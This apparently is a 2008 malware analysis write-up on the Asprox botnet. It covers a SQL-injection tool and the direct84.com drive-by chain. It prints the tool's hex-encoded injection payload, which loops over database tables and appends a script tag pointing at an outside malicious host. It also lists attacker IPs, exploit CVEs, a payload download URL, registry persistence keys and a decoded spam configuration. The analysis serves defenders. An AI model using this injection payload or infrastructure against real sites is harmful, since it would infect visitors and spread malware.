Asprox Trojan and direct84.com

On 13 May 2008 SecureWorks posted an article on a SQL-injection attack tool that was being distributed within the Asprox botnet. The tool defaults to injecting a script reference to direct84[dot]com/7.js.

SQL-injection tool:

Filename: msscntr32.exe
MD5: b33be04bff3a9953a46c26dbc853af5c
Size: 17.5 KB (17,920 bytes)

The initial HTTP requests used by the msscntr32.exe attack tool will appear similar to the following:

@S=CAST(0x4400450043004C004100520045002000400054002000760061007200630 0680061007200280032003500350029002C00400043002000760061007200630068006 10072002800320035003500290020004400450043004C00410052004500200www.example.com
The CAST hex decodes to:

DECLARE @T varchar(255),@C varchar(255) DECLARE

The full functionality of the tool is unknown at this time but binary string analysis reveals some potential capabilities. The following relevant strings were observed.

A SQL statement that includes the default injected direct84[dot]com/7.js script.

63006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E00640069007200650063007400380034002E0063006F006D002F0037002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- 4002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E0076006500720074002800760061007200

The CAST hex decodes to:

char,['+@C+']))+'' script src=http ://www[dot].direct84[dot]com/7.js script''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor??????????ì????? FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(var

The binary strings include a Google search that looks for “inurl%:asp inurl%:%s” with 100 results per page and the language setting set to English.

00005178 00405178 0 www.google.com
000051B0 004051B0 0 /search?hl=en&as_epq=&as_oq=&as_eq=&num=100&lr=lang_en&as_filetype=&ft=i&as_sitesearch=&as_qdr=all&as_rights=&as_occt=any&cr=countryUS&as_nlo=&as_nhi=&safe=images&as_q=inurl%%3Aasp+inurl%%3A%s&start=%d

The binary strings include a reference to direct84[dot]com/7.js as well as www[dot]answers.com and youtube.com. It is unknown if these domains are used to test connectivity or for decoy traffic.

00005484 00405484 0 direct84[dot]com/7.js
000054C0 004054C0 0 http://
000054DC 004054DC 0 .asp?
000054F4 004054F4 0 .google.
00005518 00405518 0 www[dot]answers[dot]com
00005554 00405554 0 youtube[dot]com
00005580 00405580 0 cache:

The following user-agent is used by the tool during SQL injection attacks

00005598 00405598 0 Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.25

Several IPs and a reference to s32.txt were visible.

00005A9C 00405A9C 0 s32.txt
00005AC0 00405AC0 0 66.199.241.98
00005ACE 00405ACE 0 82.103.140.75
00005ADC 00405ADC 0 72.21.63.114
00005AE9 00405AE9 0 66.232.102.169
00005AF8 00405AF8 0 66.96.196.53

direct84.com analysis:
The direct84.com domain currently fast-fluxes to several different IPs in the US, Israel and Poland. A short interval included the following round-robin addresses (146.6.143.67, 172.163.165.232, 212.160.151.233, 66.1.4.187, 68.45.135.137, 69.73.111.7, 71.201.175.192, 74.248.14.151, 84.109.131.90, 89.77.235.81)

The direct84.com 7.js script returned an iframe redirect to http: //67[dot]228[dot]13[dot]98/cgi-bin/index.cgi?user1. (This and following redirect paths continually change).

The 67[dot]228[dot]13[dot]98 cgi request returns an iframe redirect to http: //216[dot]32[dot]85[dot]234/index.php

The index.php returned 3 exploits:
Microsoft DirectX Media 6.0 Live Picture Corporation DirectTransform FlashPix ActiveX control buffer overflow (CVE-2007-4336)
Apple QuickTime RTSP Content-Type header stack buffer overflow (CVE-2007-6166)
MDAC RDS.Dataspace ActiveX control vulnerability (CVE-2006-0003)

The payload is http: //216[dot]32[dot]85[dot]234/load.php?MSIE downloaded as ldr.exe.

malware analysis:
The malware ldr.exe is detected as Trojan.Asprox (Symantec)

Filename: ldr.exe
MD5: f27dc661f7b51dd76adfb2d371b888e8
Size: 48640

The following files are created:

C:\WINDOWS\db32.txt.
C:\WINDOWS\system32\aspimgr.exe.
C:\WINDOWS\ws386.ini.
C:\WINDOWS\s32.txt.

The following file is deleted:

C:\WINDOWS\db32.txt

The following registry keys are created to install aspimgr.exe as a service.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "DisplayName"
Type: REG_SZ
Data: Microsoft ASPI Manager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\aspimgr.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_ASPIMGR\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Sft "(Default)"
Type: REG_SZ
Data: {4C7783CA-076B-4313-BBF1-21FB818E7701}

The malware aspimgr.exe makes the following connections and sets up an HTTP server on port 80.

* Connects to \"ns.uk2.net\" on port 53 (IP).
* Connects to \"www.yahoo.com\" on port 80 (IP).
* Connects to \"www.web.de\" on port 80 (IP).
* Connects to \"FAKE\" on port 4660 (IP).

The malware aspimgr.exe initiates a POST connection to http: //66[dot]232[dot]102[dot]169/forum.php. The connection passes system and trojan characteristics and a binary file common.bin is returned which contains trojan spamming instructions to include IP addresses, email addresses, SMTP commands, and spam email content. Common.bin can be decoded by XORing each byte with 27 (hex 0x1B) as previously referenced at SANS.

A sample decoded common.bin file:

98.200.11.115567.161.226.835129.59.138.199568.45.135.137584.109.131.90568.249.106.122524.126.130.229598.208.97.485<5_n>70.231.150.1615209.74.208.75589.78.235.81584.10.100.196575.137.93.12586.16.211.245566.233.229.99574.60.224.365<5_m>74.50.120.15055/customerup5ate5/confirm.aspx5/in5ex.php5/55/5etails.aspx5/94.js5/servlet5/profile5/ecar5s5/7.js5/olb5/custform5524.74.176.23755akronchablis@gar5ener.com55akroncha5@earthlink.net55akroncha5@technologist.com55akroncha55@unite5layer.com55akroncha5wick@royalgar5ensupplies.com55akronchaff@rrfabrications.com55akronchagrin@hair5resser.net55akronchain@clerk.com55akronchain@5iplomats.
[truncated]
Message-ID: <%%MSGID%%>55From: %%FROM%%55To: <%%RCPT%%>55Subject: %%SUBJ%%55Date: %%DATE%%55MIME-Version: 1.055Content-Type: multipart/alternative;555boun5ary="%%BND:1%%"55X-Priority: 355X-MSMail-Priority: Normal55X-Mailer: Microsoft Outlook Express 6.00.2900.218055X-MimeOLE: Pro5uce5 By Microsoft MimeOLE V6.00.2900.21805555This is a multi-part message in MIME format.5555--%%BND:1%%55Content-Type: text/plain;555charset="iso-8859-1"55Content-Transfer-Enco5ing: quote5-printable5555 Get popular cheap Soft right now!5 Absolutely all OF OUR OEMS ARE AVAILABLE ON EVERY EUROPEAN LANGUAGES -5 English, French, Italian, Spanish, German an5 any others..55 Win5ows Vista Ultimate - $71.065 Win5ows XP Pro With SP2 - $57.555 Office Enterprise 2007 - $72.015
[truncated]
helo5555<11300000resolve55<11301010ptr55<11300010reverse55<11301010fqdn55<113000115nserror55<113000115nsinvali555<113000115nsfail55<113000115nslookup55
[truncated]

Spamming must pay well...